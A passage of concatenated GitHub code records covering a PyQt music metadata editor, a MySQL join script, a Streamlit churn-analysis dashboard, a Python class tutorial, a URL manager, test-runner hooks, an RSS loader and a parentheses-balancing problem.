'squirtle']\n report = classification_report(truth, pred, target_names=target_names)\n print(report)\n matrix = confusion_matrix(truth, pred)\n df = pd.DataFrame(matrix, index = [i for i in target_names], columns = [i for i in target_names])\n fig = plt.figure(figsize = (10,7))\n sns.heatmap(df, annot=True, cbar=False, cmap=\"YlGnBu\")\n plt.savefig('matrix')\n ","repo_name":"blueyellowpink/pokemon-trainer","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25240704251","text":"\nfrom json import JSONDecodeError\nimport PyQt5\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox, QFileDialog, QProxyStyle, QTabBar, QStyle\n)\nimport PyQt5.QtWidgets as pqw\nfrom gui import mainWindow\nimport audiotypes\n\n\nclass Application(QMainWindow, mainWindow.Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n \n # Maps the object names of the fields to the instantiated label \n # objects so that we can set the label text to bold dynamically.\n # PyQT5's buddy system could also achieve a similar effect, \n # but since you can only attach one buddy to each field label pair,\n # the Disk and Track number fields will not work correctly \n # unless we do it in a different way.\n self.labelFieldMappingDictionary = {\n \"TrackNumberCurrentField\": self.TrackNumberLabel,\n \"TrackNumberMaximumField\": self.TrackNumberLabel,\n \"DiskNumberCurrentField\": self.DiskNumberLabel,\n \"DiskNumberMaximumField\": self.DiskNumberLabel,\n \"TitleField\": self.TitleLabel,\n \"ArtistField\": self.ArtistLabel,\n \"AlbumField\": self.AlbumLabel,\n \"DateField\": self.DateLabel,\n \"GenreField\": self.GenreLabel,\n \"ComposerField\": self.ComposerLabel,\n \"URLField\": self.URLLabel,\n \"ReplayGainField\": self.ReplayGainLabel,\n # \"CommentField\": self.CommentLabel,\n # \"DescriptionField\": self.DescriptionLabel\n }\n self.fieldChangedDictionary = {}\n self.isFileReading = False\n\n self.actionOpenFolder.triggered.connect(self.openFileDialog)\n self.actionSave.triggered.connect(self.saveMetadata)\n\n self.TrackNumberCurrentField.valueChanged.connect(self.trackEdited)\n self.TrackNumberMaximumField.valueChanged.connect(self.trackEdited)\n self.DiskNumberCurrentField.valueChanged.connect(self.trackEdited)\n self.DiskNumberMaximumField.valueChanged.connect(self.trackEdited)\n self.TitleField.textEdited.connect(self.trackEdited)\n self.ArtistField.textEdited.connect(self.trackEdited)\n self.AlbumField.textEdited.connect(self.trackEdited)\n self.DateField.textEdited.connect(self.trackEdited)\n self.GenreField.textEdited.connect(self.trackEdited)\n self.ComposerField.textEdited.connect(self.trackEdited)\n self.URLField.textEdited.connect(self.trackEdited)\n self.ReplayGainField.valueChanged.connect(self.trackEdited)\n self.CommentField.textChanged.connect(self.trackEdited)\n self.DescriptionField.textChanged.connect(self.trackEdited)\n\n def openFileDialog(self):\n options = QFileDialog.Options()\n fileName = QFileDialog.getExistingDirectory(self,\"QFileDialog.getOpenFileName()\", \"\", options=options)\n if fileName:\n print(fileName)\n\n model = pqw.QFileSystemModel()\n model.setRootPath(fileName)\n \n\n #model.setFilter()\n #iter = PyQt5.QDirIterator(self.path, QDirIterator.Subdirectories)\n #print(model.data())\n \n model.setNameFilters([\"*.flac\", \"*.opus\", \"*.m4a\", \"*.mp4\", \"*.mp3\"])\n #model.setNameFilterDisables(False)\n\n\n \n self.treeView.setModel(model)\n for i in range(1, self.treeView.model().columnCount()):\n self.treeView.header().hideSection(i)\n self.treeView.setRootIndex(model.index(fileName))\n\n\n self.treeView.selectionModel().selectionChanged.connect(self.itemSelected)\n \n\n def itemSelected(self, selected, deselected):\n fullSelection = self.treeView.selectionModel().selectedIndexes()\n #print(fullSelection)\n if len(fullSelection) > 0:\n model = fullSelection[0].model()\n #print(model.isDir(fullSelection[0]))\n for selection in reversed(fullSelection):\n if not model.isDir(selection):\n self.isFileReading = True\n file = audiotypes.createFileObject(model.filePath(selection))\n\n self.TrackNumberCurrentField.setValue(file.getTrackNumberCurrent())\n self.TrackNumberMaximumField.setValue(file.getTrackNumberMaximum())\n self.DiskNumberCurrentField.setValue(file.getDiskNumberCurrent())\n self.DiskNumberMaximumField.setValue(file.getDiskNumberMaximum())\n\n self.TitleField.setText(file.getTitle())\n self.ArtistField.setText(file.getArtist())\n self.AlbumField.setText(file.getAlbum())\n self.DateField.setText(file.getDate())\n self.GenreField.setText(file.getGenre())\n self.ComposerField.setText(file.getComposer())\n self.URLField.setText(file.getURL())\n self.ReplayGainField.setValue(file.getReplayGain())\n\n self.CommentField.setPlainText(file.getComment())\n self.DescriptionField.setPlainText(file.getDescription())\n # Not listening for changes with trackEdited because this field should be immutable.\n self.RawMetadataField.setPlainText(file.getAllFileMetadata())\n break\n #print(filePath)\n #selected[0].setFlags()\n\n # To stop the unblockable signals from firing and affecting the list of changes the user makes\n self.isFileReading = False\n self.fieldChangedDictionary.clear()\n self.clearCSS()\n\n\n def trackEdited(self):\n if not self.isFileReading:\n fieldName = self.sender().objectName()\n self.labelFieldMappingDictionary[fieldName].setStyleSheet(\"font-weight: bold\")\n self.fieldChangedDictionary[fieldName] = True\n print(self.fieldChangedDictionary)\n\n def saveMetadata(self):\n fullSelection = self.treeView.selectionModel().selectedIndexes()\n songSelectionsOnly = []\n if len(fullSelection) > 0:\n model = fullSelection[0].model()\n for selection in fullSelection:\n if not model.isDir(selection):\n songSelectionsOnly.append(selection)\n if len(songSelectionsOnly) > 0:\n for selection in songSelectionsOnly:\n file = audiotypes.createFileObject(model.filePath(selection))\n for field, value in self.fieldChangedDictionary.items():\n if field == \"TrackNumberCurrentField\":\n file.setTrackNumberCurrent(self.TrackNumberCurrentField.value())\n if field == \"TrackNumberMaximumField\":\n file.setTrackNumberMaximum(self.TrackNumberMaximumField.value())\n if field == \"DiskNumberCurrentField\":\n file.setDiskNumberCurrent(self.DiskNumberCurrentField.value())\n if field == \"DiskNumberMaximumField\":\n file.setDiskNumberMaximum(self.DiskNumberMaximumField.value())\n if field == \"TitleField\":\n file.setTitle(self.TitleField.text())\n if field == \"ArtistField\":\n file.setArtist(self.ArtistField.text())\n if field == \"AlbumField\":\n file.setAlbum(self.AlbumField.text())\n if field == \"DateField\":\n file.setDate(self.DateField.text())\n if field == \"GenreField\":\n file.setGenre(self.GenreField.text())\n if field == \"ComposerField\":\n file.setComposer(self.ComposerField.text())\n if field == \"URLField\":\n file.setURL(self.URLField.text())\n if field == \"ReplayGainField\":\n file.setReplayGain(self.ReplayGainField.value())\n if field == \"CommentField\":\n file.setComment(self.CommentField.toPlainText())\n if field == \"DescriptionField\":\n file.setDescription(self.DescriptionField.toPlainText())\n file.saveMetadata()\n self.fieldChangedDictionary.clear()\n self.clearCSS()\n\n def clearCSS(self):\n for key, value in self.labelFieldMappingDictionary.items():\n value.setStyleSheet(\"font-weight: normal\")","repo_name":"lukefankhanel/music-metadata-editor","sub_path":"src/gui/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":8634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15215800631","text":"#!/usr/bin/python3\n'''\nThis module is a basic interaction with\na MYSQL DB\n'''\n\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n SQLdbConnection = MySQLdb.connect(host=\"localhost\",\n port=3306,\n user=sys.argv[1],\n passwd=sys.argv[2],\n db=sys.argv[3])\n dbCurser = SQLdbConnection.cursor()\n dbCurser.execute(f'''\n SELECT cities.id, cities.name, states.name\n FROM cities INNER JOIN states\n ON cities.state_id=states.id\n ORDER BY cities.id ASC\n ''')\n query_rows = dbCurser.fetchall()\n for row in query_rows:\n print(row)\n dbCurser.close()\n SQLdbConnection.close()\n","repo_name":"Matthew-brinkmann/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/4-cities_by_state.py","file_name":"4-cities_by_state.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33992858598","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nfrom PIL import Image\r\n\r\n\r\nst.set_page_config(\r\n page_title = 'Churn Prediction - EDA',\r\n layout = 'wide')\r\n\r\ndef run():\r\n # Plot title\r\n st.title('Churn Customer Prediction')\r\n \r\n # Plot sub-header\r\n st.subheader('Exploratory Data Analysis Churn Dataset')\r\n \r\n # Add Image\r\n image = Image.open('churn.jpg')\r\n st.image(image)\r\n \r\n # Add description\r\n st.write('# Introduction')\r\n st.write('Name : Muhammad Farhan Darmawan')\r\n st.write('Batch : RMT 019')\r\n st.markdown('---')\r\n \r\n '''\r\n Dataset Description :\r\n\r\n | Column | Description |\r\n | --- | --- |\r\n | user_id\t| ID of a customer |\r\n | age\t| Age of a customer |\r\n | gender\t| Gender of a customer |\r\n | region_category\t| Region that a customer belongs to |\r\n | membership_category\t| Category of the membership that a customer is using |\r\n | joining_date | Date when a customer became a member |\r\n | joined_through_referral\t| Whether a customer joined using any referral code or ID |\r\n | preferred_offer_types | Type of offer that a customer prefers |\r\n | medium_of_operation\t| Medium of operation that a customer uses for transactions |\r\n | internet_option\t| Type of internet service a customer uses |\r\n | last_visit_time\t| The last time a customer visited the website |\r\n | days_since_last_login\t| Number of days since a customer last logged into the website |\r\n | avg_time_spent\t| Average time spent by a customer on the website |\r\n | avg_transaction_value\t| Average transaction value of a customer |\r\n | avg_frequency_login_days\t| Number of times a customer has logged in to the website |\r\n | points_in_wallet\t| Points awarded to a customer on each transaction |\r\n | used_special_discount\t| Whether a customer uses special discounts offered |\r\n | offer_application_preference\t| Whether a customer prefers offers |\r\n | past_complaint\t| Whether a customer has raised any complaints |\r\n | complaint_status\t| Whether the complaints raised by a customer was resolved |\r\n | feedback\t| Feedback provided by a customer |\r\n | churn_risk_score\t| Churn score (0 : Not churn, 1 : Churn) |\r\n '''\r\n st.write('# Dataset of Churn')\r\n #show dataframe\r\n data = pd.read_csv('churn.csv')\r\n st.dataframe(data)\r\n \r\n # data cleaning\r\n # drop column\r\n data = data.drop(['user_id'], axis=1)\r\n # change type to datetime\r\n data['joining_date'] = pd.to_datetime(data['joining_date'])\r\n data['last_visit_time'] = pd.to_datetime(data['last_visit_time'])\r\n # extract year\r\n data['joining_date_year'] = data['joining_date'].dt.year\r\n data['last_visit_year'] = data['last_visit_time'].dt.year\r\n # splitting data\r\n num_cols = data.select_dtypes(include=np.number).columns.tolist()\r\n cat_cols = data.select_dtypes(include=['object']).columns.tolist()\r\n st.markdown('---')\r\n \r\n st.write('# Histogram Graph By Churn')\r\n # Show grafik age\r\n x1 = list(data[data['churn_risk_score'] == 1]['age'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['age'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([10,65])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Age')\r\n plt.ylabel('Frequency')\r\n plt.title('Age Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n\r\n # Show grafik days last login\r\n x1 = list(data[data['churn_risk_score'] == 1]['days_since_last_login'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['days_since_last_login'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,100])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Days Last Login')\r\n plt.ylabel('Frequency')\r\n plt.title('Days Last Login Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show grafik average time spent\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_time_spent'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_time_spent'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,4000])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Time Spent')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Time Spent Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show grafik average transaction value\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_transaction_value'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_transaction_value'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,100000])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Transaction Value')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Transaction Value Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show grafik average frequency login days\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_frequency_login_days'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_frequency_login_days'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,75])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Frequency Login Days')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Frequency Login Days Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show grafik points in wallet\r\n x1 = list(data[data['churn_risk_score'] == 1]['points_in_wallet'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['points_in_wallet'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,2500])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Points in Wallet')\r\n plt.ylabel('Frequency')\r\n plt.title('Points in Wallet Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show grafik joining date\r\n x1 = list(data[data['churn_risk_score'] == 1]['joining_date_year'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['joining_date_year'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 20, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([2015,2017])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Joining Date')\r\n plt.ylabel('Frequency')\r\n plt.title('Joining Date Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.xticks([2015, 2016, 2017, 2018])\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # show grafik last visit\r\n x1 = list(data[data['churn_risk_score'] == 1]['last_visit_year'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['last_visit_year'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 20, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([2022,2024])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Last Visit')\r\n plt.ylabel('Frequency')\r\n plt.title('Last Visit Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.xticks([2022, 2023, 2024])\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n st.markdown('---')\r\n \r\n st.write('# Countplot Graph By Churn')\r\n # Daftar nama kolom\r\n cols = ['gender', 'region_category', 'membership_category',\r\n 'joined_through_referral', 'preferred_offer_types',\r\n 'medium_of_operation', 'internet_option',\r\n 'used_special_discount', 'offer_application_preference',\r\n 'past_complaint', 'complaint_status', 'feedback', 'churn_risk_score']\r\n\r\n # Membuat subplot\r\n f, axes = plt.subplots(7, 2, figsize=(40, 50), facecolor='white')\r\n f.suptitle('Frekuensi Data By Churn')\r\n\r\n # Membuat looping\r\n for i, column in enumerate(cols):\r\n row = i // 2 # Nomor baris subplot\r\n col = i % 2 # Nomor kolom subplot\r\n \r\n # Menampilkan countplot\r\n ax = sns.countplot(x=column, hue='churn_risk_score', data=data[cols], palette='Blues', ax=axes[row, col])\r\n ax.set_title(column)\r\n ax.legend(title='churn_risk_score', loc='upper right')\r\n\r\n # Menampilkan plot\r\n plt.tight_layout()\r\n plt.show()\r\n st.pyplot(f)\r\n st.markdown('---')\r\n \r\n st.write('# Distribution of Dataset')\r\n # Membuat subplot dengan ukuran 6 x 4\r\n fig, axes = plt.subplots(3, 3, figsize=(12, 12))\r\n\r\n # Mendapatkan daftar kolom dalam DataFrame\r\n columns = num_cols\r\n\r\n # Melakukan looping untuk membuat histogram pada setiap kolom\r\n for i, ax in enumerate(axes.flatten()):\r\n if i < len(columns):\r\n # Membuat histogram\r\n sns.histplot(data=data, x=columns[i], kde=True, color='steelblue', alpha=0.7, ax=ax)\r\n ax.set_xlabel(columns[i])\r\n ax.set_ylabel('frequency')\r\n\r\n # Menyusun tata letak subplot\r\n plt.tight_layout()\r\n\r\n # Menampilkan plot\r\n plt.show()\r\n st.pyplot(fig)\r\n st.markdown('---')\r\n \r\n st.write('# Scatterplot of Dataset')\r\n fig = sns.pairplot(data = data[num_cols], hue = 'churn_risk_score', palette='Blues')\r\n st.pyplot(fig)\r\n st.markdown('---')\r\n \r\n st.write(\r\n '''\r\n Statement : \r\n\r\n - From 37010 customers The age of the customer distribute from 10 - 64 years old with a mean of 37 years old. The customer joining date is in 2015 - 2017 and the last visit is in 2023, the customer will log in 14 times a day and will spend 279 hours on the website. The longest last days of customer login is 26 days.\r\n\r\n - From the average transaction value, of more than 50000 transactions the risk of the customer will churn is no, opposite that the risk of the customer will churn is the possibility to churn. The customer with < 750 points in the wallet risks churn than points in the wallet > 750\r\n\r\n - The customer churn is higher than the customer does not churn, both genders are equal, by region of city and town has a high possibility to churn, by membership category `no` and `basic` membership are high churn, and by the feedback, the customer who gives bad feedback is the high churn\r\n\r\n - There is no significant correlation of each columns and the distribution of data are skewed\r\n '''\r\n )\r\n \r\n \r\nif __name__ == '__main__':\r\n run()","repo_name":"farhandraka/Churn-Prediction-Using-ANN","sub_path":"deployment/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":12329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70756472466","text":"from datetime import datetime\r\n\r\n# Python Object-Oriented Programming\r\n # Classes\r\n # Utilizadas para criar Objetos (Instances)\r\n # Objetos são partes dentro de uma class (instancias)\r\n # Classes são utilizadas para agrupar dados e funções, podendo reutilizar\r\n #=======\r\n # Class: Frutas\r\n # Objects: Abacate, Banana...\r\n\r\n # Construtores\r\n\r\n\r\n# Criar a classe\r\nclass Funcionarios:\r\n def __init__(self, nome, sobrenome, ano_nascimento):\r\n self.nome = nome\r\n self.sobrenome = sobrenome\r\n self.ano_nascimento = ano_nascimento\r\n\r\n def nome_completo(self):\r\n return self.nome + ' ' + self.sobrenome\r\n\r\n def idade_funcionario(self):\r\n ano_atual = datetime.now().year\r\n self.ano_nascimento = int(ano_atual - self.ano_nascimento)\r\n return self.ano_nascimento\r\n\r\n \r\n# Criar o Objeto(usuário) e passar os parâmetros\r\nusuario1 = Funcionarios('Elena', 'Cabral', 2009)\r\nusuario2 = Funcionarios('Karol', 'Silva', 2000)\r\nusuario3 = Funcionarios('Dimas', 'Reis', 1988)\r\n\r\n# 3 formas de imprimir os dados\r\nprint(usuario1.nome)\r\nprint(usuario3.nome_completo())\r\nprint(Funcionarios.nome_completo(usuario2))\r\n\r\nprint(Funcionarios.idade_funcionario(usuario2))\r\n","repo_name":"AlexDimas238/Python","sub_path":"POO/construtores.py","file_name":"construtores.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8020349082","text":"import requests\n\nclass urlManager:\n def __init__(self):\n self.newUrls=set()\n self.oldUrls=set()\n self.nextUrls=set()\n self.oldNextUrls=set()\n\n def addUrl(self,url):\n if not url:\n return\n if url in self.oldUrls:\n return\n self.newUrls.add(url)\n\n def addNextUrl(self,url):\n if not url:\n return\n if url in self.oldNextUrls:\n return\n self.nextUrls.add(url)\n\n def addUrls(self,urls):\n if not urls:\n return\n for url in urls:\n self.addUrl(url)\n\n def hasNewUrl(self):\n return len(self.newUrls)!=0\n\n def getUrl(self):\n if len(self.newUrls)!=0:\n \n if len(self.newUrls)<10 and len(self.nextUrls)!=0:\n url=self.newUrls.pop()\n self.oldNextUrls.add(url)\n else:\n url=self.newUrls.pop()\n self.oldUrls.add(url)\n return url","repo_name":"Like-jian/ebay_spider","sub_path":"mylib/urlmanager.py","file_name":"urlmanager.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37622725768","text":"import torch\n\nfrom ..config import Config\nfrom .. import utils as U\nfrom .. import registry as R\nfrom .. import data as D\nfrom .runners import TestRunner\n\n\n@TestRunner.register_hook('test_begin')\ndef prepare_setup(ctx):\n \"\"\" initial ctx contains:\n - config\n - options (will be merged into config)\n - work_dir\n \"\"\"\n # load config\n assert ctx.is_not('config', None)\n if isinstance(ctx.config, str):\n ctx.config = Config.from_file(ctx.config)\n config = ctx.config\n\n # merge options\n assert ctx.isinstance('options', dict)\n config.merge(ctx.options)\n\n # work dir\n assert ctx.has('work_dir')\n ctx.work_dir = U.abspath(ctx.work_dir)\n U.mkdir(ctx.work_dir, exist_ok=True)\n\n # logger\n ctx.logger = U.get_root_logger(log_file=ctx.get('log_path'), log_level=ctx.options.log_level)\n\n # device (gpu)\n ctx.gpu_id = ctx.options.gpu_id\n assert isinstance(ctx.gpu_id, int) and ctx.gpu_id >= 0\n assert torch.cuda.is_available()\n ctx.device = torch.device('cuda', ctx.gpu_id)\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_setup')\ndef prepare_model(ctx):\n # model\n ctx.model = R.MODELS.create(ctx.config.model).to(ctx.device)\n ctx.dtype = ctx.model.dtype\n ctx.logger.info(f\"Built model {ctx.config.model.type}\")\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_model')\ndef prepare_data(ctx):\n data_cfg = ctx.config.data\n\n if ctx.has('data_test') and ctx.data_test:\n data_cfg.test = data_cfg[ctx.data_test]\n data_cfg.update_by_common(('data_source', 'data_params'), 'test')\n\n # data\n dataset_cfg = data_cfg.test.to_dict()\n dataloader_cfg = dataset_cfg.pop('data_loader', {})\n ctx.dataset = R.DATASETS.create(dataset_cfg)\n ctx.dataloader = D.get_dataloader(ctx.dataset, dataloader_cfg)\n ctx.logger.info(f\"Created dataloader of {ctx.dataset.name}: \"\n f\"batch_size = {ctx.dataloader.batch_size}, \"\n f\"num_workers = {ctx.dataloader.num_workers}\")\n\n\n@TestRunner.register_hook('test_begin', dependency='prepare_data')\ndef prepare_test(ctx):\n ctx.model.eval()\n ctx.model.call_before_eval(ctx)\n\n ctx.total_steps = len(ctx.dataloader)\n ctx.all_results = []\n\n\n@TestRunner.register_hook('test_iter_steps')\ndef iterate_test_step(ctx):\n ctx.progress_bar = U.ProgressBar(len(ctx.dataset), start=True)\n\n for i, batch in enumerate(ctx.dataloader):\n yield {'step': i,\n 'batch': batch,\n 'batch_size': batch['batch_size']}\n\n\n@TestRunner.register_hook('test_step_begin')\ndef prepare_test_step(ctx):\n pass\n\n\n@TestRunner.register_hook('test_step')\ndef do_test_step(ctx):\n with torch.no_grad():\n batch = U.to(ctx.batch, ctx.device, ctx.dtype)\n results = ctx.model.eval_step(batch['inputs'], batch)\n ctx.results = results\n\n if ctx.evaluate_mode == 'all':\n if not ctx.cache_step:\n ctx.all_results.append(results)\n else:\n ctx.dataset.cache_step(results, batch, ctx=ctx)\n elif ctx.evaluate_mode == 'step':\n ctx.dataset.evaluate_step(results, batch, ctx=ctx)\n\n for _ in range(ctx.batch_size):\n ctx.progress_bar.update()\n\n\n@TestRunner.register_hook('test_step_end')\ndef finish_test_step(ctx):\n pass\n\n\n@TestRunner.register_hook('test_end')\ndef finish_test(ctx):\n ctx.progress_bar.end()\n\n if ctx.evaluate_mode == 'all':\n results = ctx.dataset.evaluate_all(ctx.all_results, ctx=ctx)\n if results:\n ctx.logger.info('Evaluation results: \\n' + U.print_dict(results))\n\n ctx.dataset.summarize()\n ctx.model.call_after_eval(ctx)\n","repo_name":"netpaladinx/myzonelab","sub_path":"myzonecv/core/run_impl/test_hooks.py","file_name":"test_hooks.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12414722379","text":"import json\nimport feedparser\n\n\"\"\"with Controller.from_port(port = 9051) as controller:\n controller.authenticate(password='your password set for tor controller port in torrc')\n print(\"Success!\")\n controller.signal(Signal.NEWNYM)\n print(\"New Tor connection processed\")\"\"\"\n\n\n\ndef cargar_fuentes():\n \"\"\"FUNCIÓN QUE RETORNA EL DICCIONARIO DE LAS FUENTES DE NOTICIAS DE\n fuentes_rss.json\"\"\"\n with open(\"Archivos Json/fuentes_rss.json\", 'r', encoding=\"utf-8\") as fuentes_file:\n diccionario_fuentes = json.load(fuentes_file)\n return diccionario_fuentes\n\ndef consultas_feed():\n diccionario_fuentes = cargar_fuentes()\n # La variable diccionario_noticias_fuentes es un diccionario en el que cada\n # key es el nombre de una fuente y cada valor respectivo a una key es una\n # lista de noticias que tienen un determinado puntaje (>0 o un top número\n # de noticias)\n diccionario_noticias_fuentes = dict()\n # ------------------------------------------------------------------------\n for diccionario_fuente in diccionario_fuentes[\"fuentes\"]:\n nombre = diccionario_fuente[\"nombre\"]\n print(nombre)\n url = diccionario_fuente[\"url\"]\n peso = diccionario_fuente[\"peso\"]\n url_content = feedparser.parse(url)\n diccionario_noticias_fuentes[nombre] = (nombre, url_content, peso)\n return diccionario_noticias_fuentes\n","repo_name":"MatiasMingo/FinTech-News-Compiler","sub_path":"RSS/extract_rss.py","file_name":"extract_rss.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10508314005","text":"from math import prod\n\ndata = []\nwith open(\"day3.input\") as f:\n for line in f:\n data.append(line.rstrip('\\n'))\n\nheight = len(data)\nwidth = len(data[0])\n\ndef count_trees(slope):\n x = y = 0\n tree_count = 0\n while True:\n x = (x + slope[0]) % width\n y += slope[1]\n if y >= height:\n break\n if data[y][x] == '#':\n tree_count += 1\n return tree_count\n\n# Part 1\nprint(count_trees((3, 1)))\n\n# Part 2\nslopes = [\n (1, 1),\n (3, 1),\n (5, 1),\n (7, 1),\n (1, 2)\n ]\n\nprint(prod(map(count_trees, slopes)))\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4835690359","text":"# Balance Parentheses\n\"\"\"\nProblem Statement:\nA balanced sequence of parentheses is one in which every opening bracket has a corresponding closing bracket to it. \nMore formally, a sequence of parantheses is considered balanced if it can be represented in the form s1(s2) where both s1 and s2 are either empty or balanced strings.\n\nGiven a sequence of parentheses, find the minimum number of swaps needed to make the sequence balanced. It is not necessary to swap adjacent characters only. \nIf it is impossible to balance the string, return -1.\n\nExample:\nbrackets=\")()(())(\"\nSwap the characters at the first and last index to get \"(()(()))\" which is balanced. The string can be balanced with 1 swap.\n\nFunction Description\nComplete the function minimumSwaps in the editor below.\nminimumSwaps has the following parameter(s): \n string brackets: the string to analyze\n\nReturns:\nint: the minimum number of swaps or -1\n\nConstraints:\n1 <= length of the string brackets <= 10^5\nbrackets consists of ')'and '(' only\n\n\"\"\"\n\n# By iterating through the string in reverse order and keeping track of the number of open and closed brackets using the variables open_count and swaps. \n# If the current character is an open bracket, it increases the count of open brackets. If the current character is a closed bracket, \n# it either increases the number of swaps needed if the count of open brackets is 0, or decreases the count of open brackets otherwise. \n# Finally, the function returns the number of swaps needed if the count of open brackets is 0, or -1 if the 